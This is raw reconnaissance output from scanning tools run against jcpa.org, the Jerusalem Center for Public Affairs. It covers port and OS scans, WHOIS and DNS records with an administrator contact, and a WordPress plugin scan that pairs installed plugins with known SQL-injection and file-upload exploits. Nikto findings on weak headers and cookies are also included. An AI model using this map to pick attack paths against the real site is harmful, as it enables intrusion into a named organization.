- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: jcpa.org
- Altnames: DNS:jcpa.org, DNS:www.jcpa.org
- Issuer: Let's Encrypt Authority X3
- Not valid before: Jan 26 09:53:14 2019 GMT
- Not valid after: Apr 26 09:53:14 2019 GMT
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 12:26 EST
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- NSE: Starting runlevel 1 (of 2) scan.
- Initiating NSE at 12:26
- Completed NSE at 12:26, 0.00s elapsed
- NSE: Starting runlevel 2 (of 2) scan.
- Initiating NSE at 12:26
- Completed NSE at 12:26, 0.00s elapsed
- Initiating Ping Scan at 12:26
- Scanning 198.57.177.19 [4 ports]
- Completed Ping Scan at 12:26, 0.15s elapsed (1 total hosts)
- Initiating Parallel DNS resolution of 1 host. at 12:26
- Completed Parallel DNS resolution of 1 host. at 12:26, 0.02s elapsed
- Initiating Connect Scan at 12:26
- Scanning 198-57-177-19.unifiedlayer.com (198.57.177.19) [1000 ports]
- Discovered open port 443/tcp on 198.57.177.19
- Discovered open port 80/tcp on 198.57.177.19
- Completed Connect Scan at 12:27, 8.60s elapsed (1000 total ports)
- Initiating Service scan at 12:27
- Scanning 2 services on 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Completed Service scan at 12:27, 14.19s elapsed (2 services on 1 host)
- Initiating OS detection (try #1) against 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Retrying OS detection (try #2) against 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Initiating Traceroute at 12:27
- Completed Traceroute at 12:27, 6.29s elapsed
- Initiating Parallel DNS resolution of 18 hosts. at 12:27
- Completed Parallel DNS resolution of 18 hosts. at 12:27, 16.50s elapsed
- NSE: Script scanning 198.57.177.19.
- NSE: Starting runlevel 1 (of 2) scan.
- Initiating NSE at 12:27
- NSE Timing: About 99.64% done; ETC: 12:28 (0:00:00 remaining)
- NSE Timing: About 99.64% done; ETC: 12:28 (0:00:00 remaining)
- NSE Timing: About 99.64% done; ETC: 12:29 (0:00:00 remaining)
- NSE Timing: About 99.64% done; ETC: 12:29 (0:00:00 remaining)
- NSE Timing: About 99.64% done; ETC: 12:30 (0:00:01 remaining)
- Completed NSE at 12:30, 168.24s elapsed
- NSE: Starting runlevel 2 (of 2) scan.
- Initiating NSE at 12:30
- Completed NSE at 12:30, 0.00s elapsed
- Nmap scan report for 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Host is up, received reset ttl 64 (0.12s latency).
- Scanned at 2019-02-06 12:26:53 EST for 218s
- Not shown: 994 filtered ports
- Reason: 994 no-responses
- PORT STATE SERVICE REASON VERSION
- 25/tcp closed smtp conn-refused
- 80/tcp open http syn-ack Fortinet FortiGate 50B or FortiWifi 60C or 80C firewall http config
- |_http-title: 404 Not Found
- 113/tcp closed ident conn-refused
- 139/tcp closed netbios-ssn conn-refused
- 443/tcp open ssl/http syn-ack Apache httpd 2.4.38 ((cPanel) OpenSSL/1.0.2q mod_bwlimited/1.4)
- |_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
- | http-methods:
- | Supported Methods: OPTIONS HEAD GET POST TRACE
- |_ Potentially risky methods: TRACE
- | http-robots.txt: 3 disallowed entries
- |_/events/* /tag/* /wp-admin/
- |_http-server-header: Apache/2.4.38 (cPanel) OpenSSL/1.0.2q mod_bwlimited/1.4
- |_http-title: Jerusalem Center For Public Affairs
- | ssl-cert: Subject: commonName=jcpa.org
- | Subject Alternative Name: DNS:jcpa.org, DNS:www.jcpa.org
- | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2019-01-26T09:53:14
- | Not valid after: 2019-04-26T09:53:14
- | MD5: 9117 d658 f5e6 9c6f c760 5a4c 589c 2fc4
- | SHA-1: 7db6 ee59 8a36 efb0 b29f f0af 7371 3459 a385 e8f3
- | -----BEGIN CERTIFICATE-----
- | MIIFVzCCBD+gAwIBAgISBC/MwD+Qv4PsrRgNzNbXka4SMA0GCSqGSIb3DQEBCwUA
- | MEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQD
- | ExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzAeFw0xOTAxMjYwOTUzMTRaFw0x
- | OTA0MjYwOTUzMTRaMBMxETAPBgNVBAMTCGpjcGEub3JnMIIBIjANBgkqhkiG9w0B
- | AQEFAAOCAQ8AMIIBCgKCAQEAqhj0IGL6eqLcYtIjvg5ierjzCeEo8cTdqle6FG4b
- | x7jfWM0kQG2VkNta6vH/MzD0TMWfe29zOdv2IZL6V1fG+i5Gi+0vIgNp4anQelIV
- | ZLRrLbvZxjUZ3czXAViRfHniC5D/CPkKdmSc9mO2faEWcdF58E+wNTQQ1tW7wITf
- | S2Bz5/vB4qYUdasP7i1j2EuigTt+ehz7uVDvZtSiuy+P1vl7vAWO83plAdg2+MrO
- | dfmpXwKrBUhZWpyYbRerChz9kVaUf8jHA43ZBu80G810MEc5bfxhvezG9Zzx5Yg3
- | UGpJm88JMdMooacpSvRlQAMGwjQtIpW4WnmgQKVM+yf0CQIDAQABo4ICbDCCAmgw
- | DgYDVR0PAQH/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAM
- | BgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRmFYhjUZrY1asTMVSb3mJO/sh1GzAfBgNV
- | HSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYI
- | KwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYI
- | KwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMCEG
- | A1UdEQQaMBiCCGpjcGEub3Jnggx3d3cuamNwYS5vcmcwTAYDVR0gBEUwQzAIBgZn
- | gQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5s
- | ZXRzZW5jcnlwdC5vcmcwggEFBgorBgEEAdZ5AgQCBIH2BIHzAPEAdgDiaUuuJujp
- | QAnohhu2O4PUPuf+dIj7pI8okwGd3fHb/gAAAWiJysi+AAAEAwBHMEUCIC5mq3YA
- | xaCRnsEufTDKscLxDulZJjrjKF85GZeWKTOAAiEA7T2ZE87vXObJGJzUgGEXuMzA
- | RT6gsSUpByjAq58Hew0AdwApPFGWVMg5ZbqqUPxYB9S3b79Yeily3KTDDPTlRUf0
- | eAAAAWiJysiyAAAEAwBIMEYCIQDG+zKhJMi0N11iDkvNqW6A87Zg3UNcieUeksJ/
- | Q1wpTAIhAPePmOvw3YcnC7or5F69zbKdm5WDrDmmxiEb98a7FdxZMA0GCSqGSIb3
- | DQEBCwUAA4IBAQCJPGS5K4sUPpPBiIEcD3M4ICpfHIYhGNbpefrd0hTfHzBHc4Ou
- | KmdXOTTgt/ccUKxSNAVEqzgAdlBSllr09eDeDVLHWhhd1z7zz8Ch/DFrm4GjVhf8
- | O17RbIVg9ZTUtb83tp6wSbkm4+tkDsXxYk0QrXmLznds8pTxiMidn5mrZ9Zq/DK+
- | ZHVE+h9ZJhyA3G1PMIDHbaPUDoIj3wJYlV4jfJBYDLYAp1F5saObcxbmZw6G31Dw
- | QrD66shWOqoWTiysvve6is+/JTVFI7cvihQJ8dDWloMuSyCRsskVy0brjRXB5+bW
- | ojPQa9DH5Yakd4OjNvJPggOhC5cciTqgZF70
- |_-----END CERTIFICATE-----
- |
- 445/tcp closed microsoft-ds conn-refused
- Device type: general purpose|storage-misc|broadband router|WAP|phone
- Running (JUST GUESSING): Linux 3.X|4.X|2.6.X|2.4.X (93%), HP embedded (90%), Google Android 4.X (86%)
- OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:google:android:4.0 cpe:/o:linux:linux_kernel:2.4.36
- OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
- Aggressive OS guesses: Linux 3.16 - 4.6 (93%), Linux 3.18 (91%), Linux 3.10 - 4.11 (90%), Linux 3.13 or 4.2 (90%), Linux 3.16 (90%), Linux 4.2 (90%), Linux 4.4 (90%), HP P2000 G3 NAS device (90%), Linux 3.2 - 4.9 (90%), Linux 3.13 (89%)
- No exact OS matches for host (test conditions non-ideal).
- TCP/IP fingerprint:
- SCAN(V=7.70%E=4%D=2/6%OT=80%CT=25%CU=%PV=N%G=N%TM=5C5B19B7%P=x86_64-pc-linux-gnu)
- SEQ(SP=FA%GCD=1%ISR=10E%TI=Z%CI=Z%TS=8)
- OPS(O1=M4B3ST11NW7%O2=M4B3ST11NW7%O3=M4B3NNT11NW7%O4=M4B3ST11NW7%O5=M4B3ST11NW7%O6=M4B3ST11)
- WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
- ECN(R=Y%DF=Y%TG=40%W=7210%O=M4B3NNSNW7%CC=Y%Q=)
- T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
- T2(R=N)
- T3(R=N)
- T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
- T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
- T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
- T7(R=N)
- U1(R=N)
- IE(R=N)
- Uptime guess: 70.317 days (since Wed Nov 28 04:54:44 2018)
- TCP Sequence Prediction: Difficulty=250 (Good luck!)
- IP ID Sequence Generation: All zeros
- Service Info: OS: FortiOS; Device: firewall; CPE: cpe:/h:fortinet:fortiwifi:80c
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 122.49 ms 10.246.200.1
- 2 122.55 ms 190.124.251.129
- 3 122.58 ms 172.16.21.1
- 4 182.38 ms ip4-91-205-233-128.rdns.racklodge.com (91.205.233.128)
- 5 182.44 ms 192.168.7.2
- 6 182.47 ms edge2.xe0-0-14.globalmarket-4.mia007.pnap.net (63.251.152.229)
- 7 182.90 ms core2.t6-1.bbnet1.mia003.pnap.net (69.25.0.2)
- 8 183.30 ms mai-b1-link.telia.net (62.115.12.169)
- 9 182.65 ms 80.239.196.186
- 10 257.42 ms vb2000d2.rar3.sanjose-ca.us.xo.net (207.88.13.102)
- 11 257.40 ms 207.88.12.224.ptr.us.xo.net (207.88.12.224)
- 12 257.37 ms 207.88.12.195.ptr.us.xo.net (207.88.12.195)
- 13 257.29 ms 207.88.12.188.ptr.us.xo.net (207.88.12.188)
- 14 257.28 ms 207.88.12.191.ptr.us.xo.net (207.88.12.191)
- 15 256.22 ms 216.156.16.25.ptr.us.xo.net (216.156.16.25)
- 16 257.29 ms 216.51.74.158
- 17 261.40 ms eth3-33-2.prvspn002.net.unifiedlayer.com (162.144.240.163)
- 18 257.25 ms po99.prv-leaf3b.net.unifiedlayer.com (162.144.240.55)
- 19 ... 30
- NSE: Script Post-scanning.
- NSE: Starting runlevel 1 (of 2) scan.
- Initiating NSE at 12:30
- Completed NSE at 12:30, 0.00s elapsed
- NSE: Starting runlevel 2 (of 2) scan.
- Initiating NSE at 12:30
- Completed NSE at 12:30, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 218.76 seconds
- Raw packets sent: 126 (9.504KB) | Rcvd: 63 (17.287KB)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 12:30 EST
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 12:30
- Completed NSE at 12:30, 0.00s elapsed
- Initiating NSE at 12:30
- Completed NSE at 12:30, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 12:30
- Completed Parallel DNS resolution of 1 host. at 12:30, 0.02s elapsed
- Initiating UDP Scan at 12:30
- Scanning 198-57-177-19.unifiedlayer.com (198.57.177.19) [14 ports]
- Completed UDP Scan at 12:30, 2.16s elapsed (14 total ports)
- Initiating Service scan at 12:30
- Scanning 12 services on 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Service scan Timing: About 8.33% done; ETC: 12:49 (0:17:47 remaining)
- Completed Service scan at 12:32, 102.60s elapsed (12 services on 1 host)
- Initiating OS detection (try #1) against 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Retrying OS detection (try #2) against 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Initiating Traceroute at 12:32
- Completed Traceroute at 12:32, 7.17s elapsed
- Initiating Parallel DNS resolution of 1 host. at 12:32
- Completed Parallel DNS resolution of 1 host. at 12:32, 0.02s elapsed
- NSE: Script scanning 198.57.177.19.
- Initiating NSE at 12:32
- Completed NSE at 12:32, 20.31s elapsed
- Initiating NSE at 12:32
- Completed NSE at 12:32, 1.03s elapsed
- Nmap scan report for 198-57-177-19.unifiedlayer.com (198.57.177.19)
- Host is up (0.12s latency).
- PORT STATE SERVICE VERSION
- 53/udp open|filtered domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 137/udp filtered netbios-ns
- 138/udp filtered netbios-dgm
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using port 137/udp)
- HOP RTT ADDRESS
- 1 122.51 ms 10.246.200.1
- 2 ... 3
- 4 122.12 ms 10.246.200.1
- 5 121.96 ms 10.246.200.1
- 6 121.94 ms 10.246.200.1
- 7 121.94 ms 10.246.200.1
- 8 121.92 ms 10.246.200.1
- 9 121.91 ms 10.246.200.1
- 10 122.09 ms 10.246.200.1
- 11 ... 18
- 19 121.70 ms 10.246.200.1
- 20 122.59 ms 10.246.200.1
- 21 ... 27
- 28 120.92 ms 10.246.200.1
- 29 ...
- 30 121.53 ms 10.246.200.1
- NSE: Script Post-scanning.
- Initiating NSE at 12:32
- Completed NSE at 12:32, 0.00s elapsed
- Initiating NSE at 12:32
- Completed NSE at 12:32, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 138.59 seconds
- Raw packets sent: 147 (13.614KB) | Rcvd: 39 (3.658KB)
- #######################################################################################################################################
- Reversing IP With HackTarget 'www.jcpa.org'
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] 198.57.177.19
- [+] jcpa.org
- #######################################################################################################################################
- Reverse IP With YouGetSignal 'www.jcpa.org'
- ---------------------------------------------------------------------------------------------------------------------------------------
- [*] IP: 198.57.177.19
- [*] Domain: jcpa.org
- [*] Total Domains: 2
- [+] jcpa.org
- [+] www.jcpa.org
- #######################################################################################################################################
- Geo IP Lookup 'www.jcpa.org'
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] IP Address: 198.57.177.19
- [+] Country: United States
- [+] State: Utah
- [+] City: Provo
- [+] Latitude: 40.2347
- [+] Longitude: -111.6447
- #######################################################################################################################################
- Whois 'www.jcpa.org'
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] Domain Name: JCPA.ORG
- [+] Registry Domain ID: D517583-LROR
- [+] Registrar WHOIS Server: whois.networksolutions.com
- [+] Registrar URL: http://www.networksolutions.com
- [+] Updated Date: 2018-01-14T21:19:13Z
- [+] Creation Date: 1996-09-19T04:00:00Z
- [+] Registry Expiry Date: 2019-09-18T04:00:00Z
- [+] Registrar Registration Expiration Date:
- [+] Registrar: Network Solutions, LLC
- [+] Registrar IANA ID: 2
- [+] Registrar Abuse Contact Email: abuse@web.com
- [+] Registrar Abuse Contact Phone: +1.8003337680
- [+] Reseller:
- [+] Domain Status: ok https://icann.org/epp#ok
- [+] Registrant Organization: Jerusalem Center for Public Affairs
- [+] Registrant State/Province:
- [+] Registrant Country: IL
- [+] Name Server: NS3.P24.DYNECT.NET
- [+] Name Server: NS1.P24.DYNECT.NET
- [+] Name Server: NS2.P24.DYNECT.NET
- [+] Name Server: NS4.P24.DYNECT.NET
- [+] DNSSEC: unsigned
- [+] URL of the ICANN Whois Inaccuracy Complaint Form https://www.icann.org/wicf/)
- [+] >>> Last update of WHOIS database: 2019-02-06T16:06:11Z <<<
- [+] For more information on Whois status codes, please visit https://icann.org/epp
- #######################################################################################################################################
- DNS Lookup 'www.jcpa.org'
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] jcpa.org. 3599 IN SOA ns1.p24.dynect.net. darren\.jcpa.gmail.com. 702 3600 600 604800 60
- [+] jcpa.org. 21599 IN NS ns4.p24.dynect.net.
- [+] jcpa.org. 21599 IN NS ns3.p24.dynect.net.
- [+] jcpa.org. 21599 IN NS ns2.p24.dynect.net.
- [+] jcpa.org. 21599 IN NS ns1.p24.dynect.net.
- [+] jcpa.org. 59 IN A 198.57.177.19
- [+] jcpa.org. 14399 IN MX 10 jcpa-org.mail.protection.outlook.com.
- [+] jcpa.org. 14399 IN MX 0 jcpa-org.mail.protection.outlook.com.
- [+] jcpa.org. 3599 IN TXT "v=spf1 include:spf.protection.outlook.com -all"
- [+] jcpa.org. 3599 IN TXT "MS=ms16983907"
- #######################################################################################################################################
- Show HTTP Header 'www.jcpa.org'
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] HTTP/1.1 200 OK
- [+] Date: Wed, 06 Feb 2019 16:07:17 GMT
- [+] Server: Apache/2.4.38 (cPanel) OpenSSL/1.0.2q mod_bwlimited/1.4
- [+] Vary: Accept-Encoding,Cookie
- [+] Last-Modified: Tue, 05 Feb 2019 11:06:03 GMT
- [+] ETag: 1f3b5-58123985c19cc
- [+] Accept-Ranges: bytes
- [+] Content-Length: 127925
- [+] Cache-Control: max-age=3, must-revalidate
- [+] Expires: Wed, 06 Feb 2019 16:07:20 GMT
- [+] Content-Type: text/html; charset=UTF-8
- [+]
- #######################################################################################################################################
- Port Scan 'www.jcpa.org'
- ---------------------------------------------------------------------------------------------------------------------------------------
- Starting Nmap 7.40 ( https://nmap.org ) at 2019-02-06 16:07 UTC
- Nmap scan report for www.jcpa.org (198.57.177.19)
- Host is up (0.10s latency).
- rDNS record for 198.57.177.19: 198-57-177-19.unifiedlayer.com
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp closed telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp closed ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds
- #######################################################################################################################################
- Cms Scan 'www.jcpa.org'
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] Cms : WordPress
- [+] Web Servers : Apache
- [+] Programming Languages : PHP
- #######################################################################################################################################
- Robot.txt 'www.jcpa.org'
- ---------------------------------------------------------------------------------------------------------------------------------------
- User-agent: *
- Allow: /
- Disallow: /events/*
- Disallow: /tag/*
- Disallow: /wp-admin/
- Sitemap: http://jcpa.org/sitemap.xml
- #######################################################################################################################################
- Traceroute 'www.jcpa.org'
- ---------------------------------------------------------------------------------------------------------------------------------------
- Start: 2019-02-06T16:07:24+0000
- HOST: web01 Loss% Snt Last Avg Best Wrst StDev
- 1.|-- 45.79.12.201 0.0% 3 1.2 1.3 1.2 1.4 0.1
- 2.|-- 45.79.12.0 0.0% 3 1.8 1.3 0.8 1.8 0.5
- 3.|-- ae-37.a01.dllstx04.us.bb.gin.ntt.net 0.0% 3 2.0 2.1 1.0 3.2 1.1
- 4.|-- ae-9.r11.dllstx09.us.bb.gin.ntt.net 0.0% 3 28.6 28.6 28.3 28.8 0.2
- 5.|-- ae-0.r22.dllstx09.us.bb.gin.ntt.net 0.0% 3 1.8 1.9 1.4 2.5 0.5
- 6.|-- ae-5.r22.lsanca07.us.bb.gin.ntt.net 0.0% 3 31.3 29.7 28.2 31.3 1.6
- 7.|-- ae-1.r00.lsanca07.us.bb.gin.ntt.net 0.0% 3 31.1 31.1 30.8 31.5 0.3
- 8.|-- ae-0.a01.lsanca07.us.bb.gin.ntt.net 0.0% 3 36.2 36.7 35.8 38.1 1.3
- 9.|-- ae-0.endurance.lsanca07.us.bb.gin.ntt.net 0.0% 3 43.8 43.9 43.8 44.0 0.1
- 10.|-- eth3-33-1.prvspn002.net.unifiedlayer.com 0.0% 3 52.0 52.1 52.0 52.4 0.3
- 11.|-- po99.prv-leaf3b.net.unifiedlayer.com 0.0% 3 52.1 52.0 51.7 52.2 0.2
- 12.|-- 198-57-177-19.unifiedlayer.com 0.0% 3 52.2 52.2 52.1 52.2 0.1
- #######################################################################################################################################
- Ping 'www.jcpa.org'
- ---------------------------------------------------------------------------------------------------------------------------------------
- Starting Nping 0.7.70 ( https://nmap.org/nping ) at 2019-02-06 16:07 UTC
- SENT (0.0714s) ICMP [104.237.144.6 > 198.57.177.19 Echo request (type=8/code=0) id=64266 seq=1] IP [ttl=64 id=43954 iplen=28 ]
- RCVD (0.2732s) ICMP [198.57.177.19 > 104.237.144.6 Echo reply (type=0/code=0) id=64266 seq=1] IP [ttl=52 id=40013 iplen=28 ]
- SENT (1.0721s) ICMP [104.237.144.6 > 198.57.177.19 Echo request (type=8/code=0) id=64266 seq=2] IP [ttl=64 id=43954 iplen=28 ]
- RCVD (1.2933s) ICMP [198.57.177.19 > 104.237.144.6 Echo reply (type=0/code=0) id=64266 seq=2] IP [ttl=52 id=40014 iplen=28 ]
- SENT (2.0742s) ICMP [104.237.144.6 > 198.57.177.19 Echo request (type=8/code=0) id=64266 seq=3] IP [ttl=64 id=43954 iplen=28 ]
- RCVD (2.3132s) ICMP [198.57.177.19 > 104.237.144.6 Echo reply (type=0/code=0) id=64266 seq=3] IP [ttl=52 id=40015 iplen=28 ]
- SENT (3.0760s) ICMP [104.237.144.6 > 198.57.177.19 Echo request (type=8/code=0) id=64266 seq=4] IP [ttl=64 id=43954 iplen=28 ]
- RCVD (3.3332s) ICMP [198.57.177.19 > 104.237.144.6 Echo reply (type=0/code=0) id=64266 seq=4] IP [ttl=52 id=40016 iplen=28 ]
- Max rtt: 256.838ms | Min rtt: 201.752ms | Avg rtt: 229.594ms
- Raw packets sent: 4 (112B) | Rcvd: 4 (184B) | Lost: 0 (0.00%)
- Nping done: 1 IP address pinged in 3.33 seconds
- #######################################################################################################################################
- [-] Date & Time: 06/02/2019 10:48:21
- [I] Threads: 5
- [-] Target: http://jcpa.org (198.57.177.19)
- [M] Website Not in HTTPS: http://jcpa.org
- [L] X-Frame-Options: Not Enforced
- [I] Strict-Transport-Security: Not Enforced
- [I] X-Content-Security-Policy: Not Enforced
- [I] X-Content-Type-Options: Not Enforced
- [L] Robots.txt Found: http://jcpa.org/robots.txt
- [I] CMS Detection: WordPress
- [I] Wordpress Theme: jcpa
- [M] XML-RPC services are enabled
- [I] Autocomplete Off Not Found: http://jcpa.org/wp-login.php
- [-] Default WordPress Files:
- [I] http://jcpa.org/wp-includes/ID3/license.commercial.txt
- [I] http://jcpa.org/wp-includes/ID3/readme.txt
- [-] Searching Wordpress Plugins ...
- [I] adrotate
- [M] EDB-ID: 17888 "WordPress Plugin AdRotate 3.6.5 - SQL Injection"
- [M] EDB-ID: 18114 "WordPress Plugin AdRotate 3.6.6 - SQL Injection"
- [M] EDB-ID: 31834 "WordPress Plugin AdRotate 3.9.4 - 'clicktracker.ph?track' SQL Injection"
- [I] ads-box
- [M] EDB-ID: 38060 "WordPress Plugin Ads Box - 'count' SQL Injection"
- [I] all-in-one-wp-security-and-firewall
- [M] EDB-ID: 34854 "WordPress Plugin All In One WP Security & Firewall 3.8.3 - Persistent Cross-Site Scripting"
- [I] firestats
- [M] EDB-ID: 14308 "WordPress Plugin Firestats - Remote Configuration File Download"
- [M] EDB-ID: 33367 "WordPress Plugin Firestats 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (1)"
- [M] EDB-ID: 33368 "WordPress Plugin Firestats 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (2)"
- [I] jetpack v6.9
- [M] EDB-ID: 18126 "WordPress Plugin jetpack - 'sharedaddy.php' ID SQL Injection"
- [I] page-links-to v3.0.1
- [I] simple-ads-manager
- [M] EDB-ID: 36613 "WordPress Plugin Simple Ads Manager - Multiple SQL Injections"
- [M] EDB-ID: 36614 "WordPress Plugin Simple Ads Manager 2.5.94 - Arbitrary File Upload"
- [M] EDB-ID: 36615 "WordPress Plugin Simple Ads Manager - Information Disclosure"
- [M] EDB-ID: 39133 "WordPress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection"
- [I] taxonomy-images
- [I] wp-bannerize
- [M] EDB-ID: 17764 "WordPress Plugin Bannerize 2.8.6 - SQL Injection"
- [M] EDB-ID: 17906 "WordPress Plugin Bannerize 2.8.7 - SQL Injection"
- [M] EDB-ID: 36193 "WordPress Plugin WP Bannerize 2.8.7 - 'ajax_sorter.php' SQL Injection"
- [I] Checking for Directory Listing Enabled ...
- [-] Date & Time: 06/02/2019 10:51:01
- [-] Completed in: 0:02:39
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 198.57.177.19
- + Target Hostname: jcpa.org
- + Target Port: 80
- + Start Time: 2019-02-06 11:03:35 (GMT-5)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: Apache/2.4.38 (cPanel) OpenSSL/1.0.2q mod_bwlimited/1.4
- + Server leaks inodes via ETags, header found with file /, fields: 0x1f3b5 0x58123985c19cc
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Cookie wordpress_1cb6e635993cc1d35323abe8c3f81ae7 created without the httponly flag
- + Cookie wordpress_sec_1cb6e635993cc1d35323abe8c3f81ae7 created without the httponly flag
- + Cookie wordpress_logged_in_1cb6e635993cc1d35323abe8c3f81ae7 created without the httponly flag
- + Cookie wp-settings-0 created without the httponly flag
- + Cookie wp-settings-time-0 created without the httponly flag
- + Cookie wordpressuser_1cb6e635993cc1d35323abe8c3f81ae7 created without the httponly flag
- + Cookie wordpresspass_1cb6e635993cc1d35323abe8c3f81ae7 created without the httponly flag
- + Cookie wp-postpass_1cb6e635993cc1d35323abe8c3f81ae7 created without the httponly flag
- + Retrieved x-powered-by header: PHP/5.6.40
- + "robots.txt" contains 4 entries which should be manually viewed.
- + Uncommon header 'link' found, with contents: <http://jcpa.org/wp-json/>; rel="https://api.w.org/"
- + Allowed HTTP Methods: GET, POST, OPTIONS, HEAD, TRACE
- + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
- + /webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
- + /securecontrolpanel/: Web Server Control Panel
- + /webmail/: Web based mail package installed.
- ---------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 198.57.177.19
- + Target Hostname: 198.57.177.19
- + Target Port: 443
- ---------------------------------------------------------------------------------------------------------------------------------------
- + SSL Info: Subject: /CN=jcpa.org
- Ciphers: ECDHE-RSA-AES256-GCM-SHA384
- Issuer: /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
- + Start Time: 2019-02-06 11:03:40 (GMT-5)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: Apache/2.4.38 (cPanel) OpenSSL/1.0.2q mod_bwlimited/1.4
- + Cookie wordpress_1cb6e635993cc1d35323abe8c3f81ae7 created without the secure flag
- + Cookie wordpress_1cb6e635993cc1d35323abe8c3f81ae7 created without the httponly flag
- + Cookie wordpress_sec_1cb6e635993cc1d35323abe8c3f81ae7 created without the secure flag
- + Cookie wordpress_sec_1cb6e635993cc1d35323abe8c3f81ae7 created without the httponly flag
- + Cookie wordpress_logged_in_1cb6e635993cc1d35323abe8c3f81ae7 created without the secure flag
- + Cookie wordpress_logged_in_1cb6e635993cc1d35323abe8c3f81ae7 created without the httponly flag
- + Cookie wp-settings-0 created without the secure flag
- + Cookie wp-settings-0 created without the httponly flag
- + Cookie wp-settings-time-0 created without the secure flag
- + Cookie wp-settings-time-0 created without the httponly flag
- + Cookie wordpressuser_1cb6e635993cc1d35323abe8c3f81ae7 created without the secure flag
- + Cookie wordpressuser_1cb6e635993cc1d35323abe8c3f81ae7 created without the httponly flag
- + Cookie wordpresspass_1cb6e635993cc1d35323abe8c3f81ae7 created without the secure flag
- + Cookie wordpresspass_1cb6e635993cc1d35323abe8c3f81ae7 created without the httponly flag
- + Cookie wp-postpass_1cb6e635993cc1d35323abe8c3f81ae7 created without the secure flag
- + Cookie wp-postpass_1cb6e635993cc1d35323abe8c3f81ae7 created without the httponly flag
- + Retrieved x-powered-by header: PHP/5.6.40
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
